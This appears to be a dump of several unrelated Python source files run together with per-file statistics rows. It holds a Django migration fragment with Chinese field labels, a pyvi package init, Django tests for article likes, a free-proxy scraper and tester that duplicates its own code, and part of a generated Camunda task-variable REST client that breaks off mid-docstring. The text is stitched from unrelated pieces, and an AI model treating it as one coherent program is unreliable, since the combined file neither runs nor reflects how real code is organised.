        ('pfam', 'pfam_id', 'Pfam ID'),
        ('sample', 'barcode_id', '条形码ID'),
        ('sample', 'chip_id', '芯片ID'),
        ('sample', 'collection_location', '采样地点'),
        ('sample', 'collection_tissue', '采样组织'),
        ('sample', 'collection_tissue_detail', '采样组织细节'),
        ('sample', 'collector', '采样人'),
        ('sample', 'field_store_condition', '野外保存条件'),
        ('sample', 'field_store_duration', '野外保存时间'),
        ('sample', 'herb_id', '药物编码'),
        ('sample', 'herb_name', '药物名称'),
        ('sample', 'herb_name_note', '药物名称注释'),
        ('sample', 'lane_id', 'Lane ID'),
        ('sample', 'receiver', '样本接收人'),
        ('sample', 'sample_pic_name', '样本照片名称'),
        ('sample', 'seq_id', '测序编号'),
        ('sample', 'sequencing_length_type', '测序长度类型'),
        ('sample', 'sequencing_platform', '测序平台'),
        ('sample', 'sequencing_sample_id', '测序样本ID'),
        ('sample', 'temporary_store_condition', '临时保存条件'),
        ('sample', 'tissue_id', '组织编号'),
        ('sample', 'transport_store_condition', '运输保存条件'),
        ('species', 'guijing', '药-归经'),
        ('species', 'herb_name', '药物名称'),
        ('species', 'herb_pinyin', '药物拼音'),
        ('species', 'nature', '药-性'),
        ('species', 'origin', '地源'),
        ('species', 'palnt_class', '分类纲'),
        ('species', 'plant_family', '分类科'),
        ('species', 'plant_genus', '分类属'),
        ('species', 'plant_name', '植物名称'),
        ('species', 'plant_order', '分类目'),
        ('species', 'plant_species', '分类种'),
        ('species', 'species_suffix', '种后缀'),
        ('species', 'taste', '药-味'),
        ('species', 'tissue', '用药组织'),
        ('species', 'toxin', '药-毒'),
        ('ssr', 'gene', '基因名称'),
        ('ssr', 'ssr_type', 'SSR类型'),
        ('swissprot', 'gene', '基因名称'),
        ('swissprot', 'swissprot_id', 'SwissProt ID'),
    ]

    # The outermost iterable of a comprehension is evaluated in the class
    # scope, so _ALTERED_FIELDS is visible here.
    operations = [
        migrations.AlterField(
            model_name=model,
            name=field,
            field=models.CharField(max_length=250, verbose_name=label),
        )
        for model, field, label in _ALTERED_FIELDS
    ]
| 34.923567
| 80
| 0.553711
| 1,052
| 10,966
| 5.551331
| 0.119772
| 0.205479
| 0.256849
| 0.297945
| 0.903596
| 0.901884
| 0.727226
| 0.596918
| 0.433904
| 0.23887
| 0
| 0.026947
| 0.323181
| 10,966
| 313
| 81
| 35.035144
| 0.759903
| 0.004195
| 0
| 0.677524
| 1
| 0
| 0.111925
| 0.010716
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003257
| 0
| 0.013029
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
968cb4959cdd188d5c9e75379e7587eb339a99c5
| 76
|
py
|
Python
|
pyvi/modes/__init__.py
|
Julian/PyVi
|
5e9e087146e0baffbe791bacccbfd4b840cdeb5f
|
[
"MIT"
] | 3
|
2018-07-26T09:52:31.000Z
|
2019-07-02T14:29:31.000Z
|
pyvi/modes/__init__.py
|
Julian/PyVi
|
5e9e087146e0baffbe791bacccbfd4b840cdeb5f
|
[
"MIT"
] | null | null | null |
pyvi/modes/__init__.py
|
Julian/PyVi
|
5e9e087146e0baffbe791bacccbfd4b840cdeb5f
|
[
"MIT"
] | null | null | null |
from pyvi.modes._insert import insert
from pyvi.modes._normal import normal
| 25.333333
| 37
| 0.842105
| 12
| 76
| 5.166667
| 0.5
| 0.258065
| 0.419355
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 76
| 2
| 38
| 38
| 0.911765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73a8423f3cd7762e10e4b23bc84ca3973db17257
| 7,761
|
py
|
Python
|
authors/apps/articles/tests/test_like_articles.py
|
andela/Ah-backend-valkyrie
|
f0eb64c27e1fe37d5c81e4b9a8762dcf3c336a79
|
[
"BSD-3-Clause"
] | null | null | null |
authors/apps/articles/tests/test_like_articles.py
|
andela/Ah-backend-valkyrie
|
f0eb64c27e1fe37d5c81e4b9a8762dcf3c336a79
|
[
"BSD-3-Clause"
] | 46
|
2019-01-08T13:16:41.000Z
|
2021-04-30T20:47:08.000Z
|
authors/apps/articles/tests/test_like_articles.py
|
andela/Ah-backend-valkyrie
|
f0eb64c27e1fe37d5c81e4b9a8762dcf3c336a79
|
[
"BSD-3-Clause"
] | 3
|
2019-01-07T08:21:59.000Z
|
2019-09-20T06:43:18.000Z
|
import json
from rest_framework.reverse import reverse
from rest_framework import status
from authors.apps.authentication.tests.base import BaseTestMethods
from authors.apps.articles.models import Article, LikeArticle
from authors.apps.authentication.models import User
class TestLikeArticle(BaseTestMethods):
    """Tests for the article like/dislike endpoints and like-count queries.

    Review fixes applied to the original:

    * ``test_unlike_article`` was defined twice with byte-identical bodies;
      the second definition silently shadowed the first, so only one copy
      ever ran.  The duplicate was removed.
    * ``assertTrue(x, True)`` / ``assertFalse(x, False)`` passed the second
      value as unittest's failure *message*, not as an expected value; the
      misleading second argument was dropped (the truthiness check is
      unchanged).
    * The repeated register/login/create-article boilerplate was factored
      into private helpers.
    """

    def _login(self):
        """Register and log in a user; attach their token to the test client."""
        user = self.register_and_loginUser()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + user.data.get('token'))
        return user

    def _create_article(self):
        """Log in and create one article; return the creation response."""
        self._login()
        url = reverse(self.get_post_article_url)
        return self.client.post(url, data=self.article, format='json')

    def _like_url(self, response, view='articles:like-article'):
        """Build the like/dislike URL for the article created in *response*."""
        return reverse(view, kwargs={'slug': response.data.get('slug')})

    def test_like_article(self):
        """Tests that an article has been liked successfuly"""
        response = self._create_article()
        res = self.client.post(self._like_url(response))
        self.assertTrue(res.data.get('like'))
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_unlike_article(self):
        """Tests that a like is removed from an article"""
        response = self._create_article()
        like_url = self._like_url(response)
        self.client.post(like_url)
        # Like same article a second time
        res = self.client.post(like_url)
        self.assertTrue(res.data.get('like'))
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_dislike_article(self):
        """Tests that an article has been disliked successfuly"""
        response = self._create_article()
        res = self.client.post(
            self._like_url(response, 'articles:dislike-article'))
        self.assertFalse(res.data.get('like'))
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_un_dislike_article(self):
        """Tests that a dislike is removed from an article"""
        response = self._create_article()
        data = {'slug': response.data.get('slug')}
        like_url = reverse('articles:dislike-article', kwargs=data)
        self.client.post(like_url)
        # Dislike same article a second time
        res = self.client.post(like_url, data=data, format='json')
        self.assertFalse(res.data.get('like'))
        self.assertEqual(res.status_code, status.HTTP_200_OK)

    def test_get_likes(self):
        """Likes for a particular article are fetched from the database."""
        response = self._create_article()
        self.client.post(self._like_url(response))
        article = self.like_helper_class.get_article_by_slug(
            model=Article,
            slug=response.data.get('slug')
        )
        likes = self.like_helper_class.get_likes_or_dislike(
            model=LikeArticle,
            like=True,
            article_id=article.id
        )
        self.assertEqual(likes.get('count'), 1)

    def test_get_dislikes(self):
        """Dislikes for a particular article are fetched from the database."""
        response = self._create_article()
        self.client.post(self._like_url(response, 'articles:dislike-article'))
        article = self.like_helper_class.get_article_by_slug(
            model=Article,
            slug=response.data.get('slug')
        )
        likes = self.like_helper_class.get_likes_or_dislike(
            model=LikeArticle,
            like=False,
            article_id=article.id
        )
        self.assertEqual(likes.get('count'), 1)

    def test_like_article_with_invalid_slug(self):
        """Liking an article fails for a slug that does not exist."""
        self._login()
        like_url = reverse('articles:like-article',
                           kwargs={'slug': 'this-does-not-exist'})
        response = self.client.post(like_url)
        # A 'detail' error body is expected for the missing article.
        self.assertTrue(response.data.get('detail'))
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_dislike_article_with_invalid_slug(self):
        """Disliking an article fails for a slug that does not exist."""
        self._login()
        like_url = reverse('articles:dislike-article',
                           kwargs={'slug': 'this-does-not-exist'})
        response = self.client.post(like_url)
        # A 'detail' error body is expected for the missing article.
        self.assertTrue(response.data.get('detail'))
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_get_article_by_slug(self):
        """An article can be retrieved using its slug."""
        response = self._create_article()
        article = self.like_helper_class.get_article_by_slug(
            model=Article,
            slug=response.data.get('slug')
        )
        self.assertEqual(type(article), Article)
| 38.231527
| 74
| 0.622085
| 931
| 7,761
| 5.01826
| 0.105263
| 0.064212
| 0.059932
| 0.046233
| 0.903896
| 0.891695
| 0.891695
| 0.876712
| 0.861301
| 0.861301
| 0
| 0.004028
| 0.26427
| 7,761
| 202
| 75
| 38.420792
| 0.814186
| 0.085556
| 0
| 0.775641
| 0
| 0
| 0.083646
| 0.029038
| 0
| 0
| 0
| 0
| 0.108974
| 1
| 0.064103
| false
| 0
| 0.038462
| 0
| 0.108974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73d2c95d062fcbf3cbf16ee2dec442430b6bb168
| 11,819
|
py
|
Python
|
proxyscraper.py
|
ErsterImChat/Proxy-Scraper
|
73a76cb3dae325530299e5ce0d3a5e9f607c35c3
|
[
"Unlicense"
] | 1
|
2021-09-23T17:57:12.000Z
|
2021-09-23T17:57:12.000Z
|
proxyscraper.py
|
ErsterImChat/Proxy-Scraper
|
73a76cb3dae325530299e5ce0d3a5e9f607c35c3
|
[
"Unlicense"
] | null | null | null |
proxyscraper.py
|
ErsterImChat/Proxy-Scraper
|
73a76cb3dae325530299e5ce0d3a5e9f607c35c3
|
[
"Unlicense"
] | null | null | null |
import json
import os
import requests
import time
# Ask once which mode to run: 1 = scrape, 2 = test, 3 = both.
scrapeortest = input("Scrape, Test or both? (1, 2 or 3) ")
if scrapeortest == str(1):
    # ---- Scrape mode ----------------------------------------------------
    # Ask ProxyScrape how many proxies it currently offers.
    ProxyStatus = requests.get("https://api.proxyscrape.com/v2/?request=proxyinfo&simplified=true")
    # NOTE(review): this answer is read but never used afterwards — confirm intent.
    OnlyPS = input("Do you want to use all Proxie Sources? (else only ProxieScrape) (yes/no): \n")
    # Parse the status reply directly; the original wrote it to a temp file
    # (proxiecountall.json) only to read it straight back and delete it.
    status = json.loads(ProxyStatus.text)
    print(str(status["proxy_count"]) + " Proxies are avalible from ProxieScrape, other Sources cant be counted before scraping.\n")
    # Gather request parameters; https filtering only applies to http proxies.
    HTTPS = "yes"
    TYPE = input("Which Type?: http,socks4,socks5,all: \n")
    if TYPE == "http":
        HTTPS = input("Should the Proxys support https? (yes/no): \n")
    if HTTPS == "yes":
        SSL = "all"
    else:
        SSL = ""
    TIMEOUT = input("Which Timeout?: \n")
    # Fetch the proxy list from ProxyScrape and save it ('with' closes the
    # file handles the original left open).
    ProxyAPI = requests.get("https://api.proxyscrape.com/v2/?request=displayproxies&protocol=" + TYPE + "&timeout=" + TIMEOUT + "&country=all&ssl=+" + SSL + "&anonymity=all")
    print(ProxyAPI.text)
    with open("proxies_list.txt", "w") as outfile:
        outfile.write(ProxyAPI.text)
    # Fetch a second source (openproxylist.xyz) and append it.
    if TYPE == "all":
        ProxyAPI2 = requests.get("https://api.openproxylist.xyz/http.txt")
    else:
        ProxyAPI2 = requests.get("https://api.openproxylist.xyz/" + TYPE + ".txt")
    print(ProxyAPI2.text)
    with open("proxies_list.txt", "a") as outfile:
        outfile.write(ProxyAPI2.text)
    # Drop blank lines, rewrite the file, and report the final count.
    with open("proxies_list.txt") as f:
        kept = [line for line in f if not line.isspace()]
    with open("proxies_list.txt", "w") as f:
        f.writelines(kept)
    print(str(len(kept)) + " Proxies have been saved to proxies_list.txt\n")
    input("Press Enter to close")
# Mode 2: verify previously scraped proxies (tester credited to sonerb).
if scrapeortest == str(2):
    print("Credits to sonerb for creating the Proxy-Tester")
    time.sleep(2)
    # NOTE(review): these re-import modules already imported at the top of
    # the file (harmless no-ops) plus the tester's own extras; they only
    # execute when mode 2 is chosen.
    import math
    import os
    import os.path
    import requests
    from threading import Thread
    import sys
    import time
    # Shared state for the verifier threads below.
    timeout = 5  # per-request timeout in seconds, read by verify_list
    good_list = []  # proxies that passed verification; threads append here
def verify_list(proxy_list, thread_number):
    """Probe each proxy in *proxy_list* and collect the working ones.

    A proxy counts as working when an HTTP GET to ipinfo.io through it
    succeeds within the global ``timeout`` and the reply is JSON with an
    ``'ip'`` key.  Working proxies are appended to the global
    ``good_list``.  Runs in a worker thread; *thread_number* only tags the
    console output.
    """
    global good_list, timeout
    working = []
    for prox in proxy_list:
        try:
            proxies = {
                "http": "http://" + prox + "/",
            }
            reply = requests.get("http://ipinfo.io/json", proxies=proxies, timeout=timeout)
            # Accessing 'ip' validates the JSON body; a missing key means
            # the proxy returned garbage and is treated as a failure.
            reply.json()['ip']
            print('[Thread:', thread_number, '] Proxy works:', prox)
            working.append(prox)
        except Exception:
            # Best-effort probe: any failure simply skips this proxy.
            pass
    print('[Thread:', thread_number, '] Working Proxies:', working)
    good_list += working
def get_proxy_list():
    """Return full paths of every 'proxies_*' file next to this script.

    Uses ``os.path.dirname`` in place of the original hand-rolled reverse
    scan for the last '/' or '\\\\'; ``abspath`` guarantees separators are
    present, and './' is kept as the original's fallback.
    """
    here = os.path.abspath(__file__)
    parent = os.path.dirname(here)
    directory = parent + os.sep if parent else './'
    proxy_files = []
    for name in os.listdir(directory):
        # Original filter: longer than 12 characters and starting with
        # 'proxies_' (e.g. 'proxies_list.txt').
        if len(name) > 12 and name.startswith('proxies_'):
            proxy_files.append(directory + name)
    return proxy_files
def get_proxies(files):
    """Read every file in *files* and return all lines, stripped, as one list.

    The original opened each file in 'r+' mode and never closed the
    handle; 'with' fixes the leak without changing the result.
    """
    proxy_list = []
    for path in files:
        with open(path) as fh:
            proxy_list.extend(line.strip() for line in fh)
    return proxy_list
def setup(number_threads):
thread_amount = float(number_threads)
proxy_list = get_proxies(get_proxy_list())
amount = int(math.ceil(len(proxy_list) / thread_amount))
proxy_lists = [proxy_list[x:x + amount] for x in range(0, len(proxy_list), amount)]
if len(proxy_list) % thread_amount > 0.0:
proxy_lists[len(proxy_lists) - 1].append(proxy_list[len(proxy_list) - 1])
return proxy_lists
def start(threads):
    """Verify all known proxies with *threads* workers and save the results.

    Spawns one thread per chunk returned by setup(), waits for them all, and
    writes the surviving proxies to working_proxies_list.txt.

    :param threads: worker thread count (passed through to setup())
    """
    start_time = time.time()
    thread_list = []
    # enumerate() replaces the original manual counter variable.
    for count, chunk in enumerate(setup(threads)):
        worker = Thread(target=verify_list, args=(chunk, count))
        worker.start()
        thread_list.append(worker)
    for worker in thread_list:
        worker.join()
    print('[All    ] Working Proxies:', good_list)
    # 'with' guarantees the file is flushed and closed.
    with open('working_proxies_list.txt', 'w+') as f:
        f.write(''.join(prox + '\n' for prox in good_list))
    stop_time = time.time()
    print('[{0:.2f} seconds]'.format(stop_time - start_time))
# Entry point for the tester: thread count can be overridden via argv[1]
# (setup() converts it with float(), so a string argument is fine).
if __name__ == "__main__":
if len(sys.argv) > 1:
start(sys.argv[1])
else:
start(100)
# Branch 3: scrape proxies from every source, then hand them to the tester.
if scrapeortest == str(3):
    # Ask ProxyScrape how many proxies it currently serves.
    ProxyStatus = requests.get("https://api.proxyscrape.com/v2/?request=proxyinfo&simplified=true")
    # NOTE(review): this answer is collected but never used anywhere below.
    OnlyPS = input("Do you want to use all Proxie Sources? (else only ProxieScrape) (yes/no): \n")
    # Parse the status response directly instead of bouncing it through a
    # temporary proxiecountall.json file that was immediately deleted again.
    proxy_info = ProxyStatus.json()
    print(str(proxy_info["proxy_count"]) + " Proxies are avalible from ProxieScrape, other Sources cant be counted before scraping.\n")
    # Collect the request parameters from the user.
    HTTPS = "yes"
    TYPE = input("Which Type?: http,socks4,socks5,all: \n")
    if TYPE == "http":
        HTTPS = input("Should the Proxys support https? (yes/no): \n")
    if HTTPS == "yes":
        SSL = "all"
    else:
        SSL = ""
    TIMEOUT = input("Which Timeout?: \n")
    # Scrape from ProxyScrape.  Fixed: the original URL contained a stray '+'
    # ("&ssl=+" + SSL), which corrupted the ssl query parameter.
    ProxyAPI = requests.get("https://api.proxyscrape.com/v2/?request=displayproxies&protocol=" + TYPE + "&timeout=" + TIMEOUT + "&country=all&ssl=" + SSL + "&anonymity=all")
    print(ProxyAPI.text)
    with open("proxies_list.txt", "w") as outfile:
        outfile.write(ProxyAPI.text)
    # Scrape from openproxylist.xyz; it has no 'all' endpoint, so fall back
    # to its http list in that case.
    if TYPE == "all":
        ProxyAPI2 = requests.get("https://api.openproxylist.xyz/http.txt")
    else:
        ProxyAPI2 = requests.get("https://api.openproxylist.xyz/" + TYPE + ".txt")
    print(ProxyAPI2.text)
    with open("proxies_list.txt", "a") as outfile:
        outfile.write(ProxyAPI2.text)
    # Strip blank lines from the combined list.
    output = ""
    with open("proxies_list.txt") as f:
        for line in f:
            if not line.isspace():
                output += line
    with open("proxies_list.txt", "w") as f:
        f.write(output)
    # Count and report the scraped proxies, then fall through to the tester.
    with open('proxies_list.txt') as f:
        num_lines = sum(1 for line in f)
    print(str(num_lines) + " Proxies have been saved to proxies_list.txt\nNow they are getting tested.")
    print("Credits to sonerb for creating the Proxy-Tester")
    time.sleep(2)
    import math
    import os
    import os.path
    import requests
    from threading import Thread
    import sys
    import time
    # Seconds per proxy check; shared result list filled by the workers.
    timeout = 5
    good_list = []
def verify_list(proxy_list, thread_number):
    """Probe every proxy in *proxy_list* and record the live ones.

    Each proxy is used for one HTTP request to ipinfo.io; proxies that answer
    within the global *timeout* are appended to the shared global *good_list*.

    :param proxy_list: list of "host:port" strings to test
    :param thread_number: index of the worker thread, used only for logging
    """
    global good_list, timeout
    working_list = []
    for prox in proxy_list:
        proxy_dict = {
            "http": "http://" + prox + "/",
        }
        try:
            r = requests.get("http://ipinfo.io/json",
                             proxies=proxy_dict, timeout=timeout)
            # Raises if the answer is not JSON carrying an 'ip' field, so a
            # proxy that returns garbage is not counted as working.
            r.json()['ip']
            print('[Thread:', thread_number, '] Proxy works:', prox)
            working_list.append(prox)
        except Exception:
            # Dead proxy, timeout or malformed response: skip it silently.
            pass
    print('[Thread:', thread_number, '] Working Proxies:', working_list)
    good_list += working_list
def get_proxy_list():
    """Return the paths of all proxy files stored next to this script.

    A proxy file is any sibling file whose name starts with ``proxies_`` and
    is longer than 12 characters (e.g. ``proxies_list.txt``).

    :return: list of file paths
    """
    # os.path.dirname replaces the original hand-rolled reverse scan for the
    # last path separator; abspath guarantees the result is non-empty.
    directory = os.path.dirname(os.path.abspath(__file__))
    proxy_files = []
    for name in os.listdir(directory):
        if len(name) > 12 and name.startswith('proxies_'):
            proxy_files.append(os.path.join(directory, name))
    return proxy_files
def get_proxies(files):
    """Read every file in *files* and return all its lines, stripped.

    :param files: iterable of file paths produced by get_proxy_list()
    :return: flat list of proxy strings ("host:port"), one per line
    """
    proxy_list = []
    for path in files:
        # Fixed: the original opened each file with 'r+' and never closed it.
        with open(path) as fh:
            for prox in fh:
                proxy_list.append(prox.strip())
    return proxy_list
def setup(number_threads):
    """Split every known proxy into up to *number_threads* chunks.

    Reads all proxy files via get_proxies()/get_proxy_list() and returns a
    list of proxy sub-lists, one per worker thread.

    :param number_threads: desired thread count (int, float or numeric str)
    :return: list of proxy lists (empty list when no proxies were found)
    """
    thread_amount = float(number_threads)
    proxy_list = get_proxies(get_proxy_list())
    if not proxy_list:
        # Avoid range() with a zero step (ValueError) and pointless worker
        # threads when there is nothing to test.
        return []
    amount = int(math.ceil(len(proxy_list) / thread_amount))
    # The slicing below already covers every proxy.  The original code
    # additionally re-appended proxy_list[-1] whenever the division was not
    # exact, so the last proxy was tested twice; that bug is removed here.
    return [proxy_list[i:i + amount] for i in range(0, len(proxy_list), amount)]
def start(threads):
    """Verify all known proxies with *threads* workers and save the results.

    Spawns one thread per chunk returned by setup(), waits for them all, and
    writes the surviving proxies to working_proxies_list.txt.

    :param threads: worker thread count (passed through to setup())
    """
    start_time = time.time()
    thread_list = []
    # enumerate() replaces the original manual counter variable.
    for count, chunk in enumerate(setup(threads)):
        worker = Thread(target=verify_list, args=(chunk, count))
        worker.start()
        thread_list.append(worker)
    for worker in thread_list:
        worker.join()
    print('[All    ] Working Proxies:', good_list)
    # 'with' guarantees the file is flushed and closed.
    with open('working_proxies_list.txt', 'w+') as f:
        f.write(''.join(prox + '\n' for prox in good_list))
    stop_time = time.time()
    print('[{0:.2f} seconds]'.format(stop_time - start_time))
# Entry point for the tester: thread count can be overridden via argv[1]
# (setup() converts it with float(), so a string argument is fine).
if __name__ == "__main__":
if len(sys.argv) > 1:
start(sys.argv[1])
else:
start(100)
else:
# None of the menu options (1/2/3) matched the user's input.
print("I said 1, 2 or 3... Try better next Time!")
| 29.400498
| 175
| 0.557408
| 1,385
| 11,819
| 4.628159
| 0.143682
| 0.047738
| 0.030577
| 0.028081
| 0.965991
| 0.965367
| 0.958346
| 0.958346
| 0.958346
| 0.958346
| 0
| 0.009296
| 0.31737
| 11,819
| 401
| 176
| 29.473815
| 0.785201
| 0.083087
| 0
| 0.957529
| 0
| 0.007722
| 0.198386
| 0.011048
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03861
| false
| 0
| 0.069498
| 0
| 0.131274
| 0.081081
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb6d50e9a81c14ff9526a67855d2a7eab876019c
| 50,129
|
py
|
Python
|
openapi-python-client/openapi_client/api/task_variable_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_variable_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
openapi-python-client/openapi_client/api/task_variable_api.py
|
yanavasileva/camunda-bpm-examples
|
051f8f28c62845e68ce4059ab64264c5a0bdc009
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Camunda BPM REST API
OpenApi Spec for Camunda BPM REST API. # noqa: E501
The version of the OpenAPI document: 7.13.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from openapi_client.api_client import ApiClient
from openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
# REST client for the task-variable endpoints of the Camunda BPM REST API.
class TaskVariableApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
# api_client: transport used for every call; a default ApiClient is
# constructed when the caller does not supply one.
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_task_variable(self, id, var_name, **kwargs):  # noqa: E501
    """Remove a variable that is visible to a task.

    A variable is visible to a task if it is a local task variable or is
    declared in a parent scope of the task.  Synchronous by default; pass
    ``async_req=True`` to receive a thread whose ``get()`` yields the result.

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to delete the variable from. (required)
    :param str var_name: The name of the variable to be removed. (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             without reading/decoding it. Default is True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: None, or the request thread when called asynchronously
    """
    # Delegate to the *_with_http_info variant, forcing it to hand back only
    # the response data (no status code / headers).
    return self.delete_task_variable_with_http_info(
        id, var_name, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
# Full-detail variant of delete_task_variable: issues the HTTP DELETE and
# can also return status code and headers, depending on kwargs.
def delete_task_variable_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""delete_task_variable # noqa: E501
Removes a variable that is visible to a task. A variable is visible to a task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_variable_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to delete the variable from. (required)
:param str var_name: The name of the variable to be removed. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
# locals() must be the FIRST statement so it captures exactly the call
# arguments (self, id, var_name, kwargs); do not add locals above it.
local_var_params = locals()
all_params = [
'id',
'var_name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
# Fold **kwargs into local_var_params, rejecting unknown options.
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_task_variable" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_task_variable`") # noqa: E501
# verify the required parameter 'var_name' is set
if self.api_client.client_side_validation and ('var_name' not in local_var_params or # noqa: E501
local_var_params['var_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `var_name` when calling `delete_task_variable`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'var_name' in local_var_params:
path_params['varName'] = local_var_params['var_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# Dispatch DELETE /task/{id}/variables/{varName} via the shared ApiClient.
return self.api_client.call_api(
'/task/{id}/variables/{varName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_variable(self, id, var_name, **kwargs):  # noqa: E501
    """Retrieve a variable from the context of a given task.

    The variable must be visible from the task: a local task variable or one
    declared in a parent scope of the task.  Synchronous by default; pass
    ``async_req=True`` to receive a thread whose ``get()`` yields the result.

    :param async_req bool: execute request asynchronously
    :param str id: The id of the task to retrieve the variable from. (required)
    :param str var_name: The name of the variable to get. (required)
    :param bool deserialize_value: when True (the default on the server),
        serialized Java variable values are deserialized server-side and
        rendered as JSON; when False they are returned in serialized form.
        Camunda recommends False for non-Java clients.
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
                             without reading/decoding it. Default is True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: VariableValueDto, or the request thread when called asynchronously
    """
    # Delegate to the *_with_http_info variant, forcing it to hand back only
    # the response data (no status code / headers).
    return self.get_task_variable_with_http_info(
        id, var_name, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
# Full-detail variant of get_task_variable: issues the HTTP GET and can also
# return status code and headers, depending on kwargs.
def get_task_variable_with_http_info(self, id, var_name, **kwargs): # noqa: E501
"""get_task_variable # noqa: E501
Retrieves a variable from the context of a given task. The variable must be visible from the task. It is visible from the task if it is a local task variable or declared in a parent scope of the task. See documentation on [visiblity of variables](https://docs.camunda.org/manual/7.13/user-guide/process-engine/variables/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_variable_with_http_info(id, var_name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to retrieve the variable from. (required)
:param str var_name: The name of the variable to get. (required)
:param bool deserialize_value: Determines whether serializable variable values (typically variables that store custom Java objects) should be deserialized on the server side (default `true`). If set to `true`, a serializable variable will be deserialized on server side and transformed to JSON using [Jackson's](https://github.com/FasterXML/jackson) POJO/bean property introspection feature. Note that this requires the Java classes of the variable value to be on the REST API's classpath. If set to `false`, a serializable variable will be returned in its serialized format. For example, a variable that is serialized as XML will be returned as a JSON string containing XML. Note: While `true` is the default value for reasons of backward compatibility, we recommend setting this parameter to `false` when developing web applications that are independent of the Java process applications deployed to the engine.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
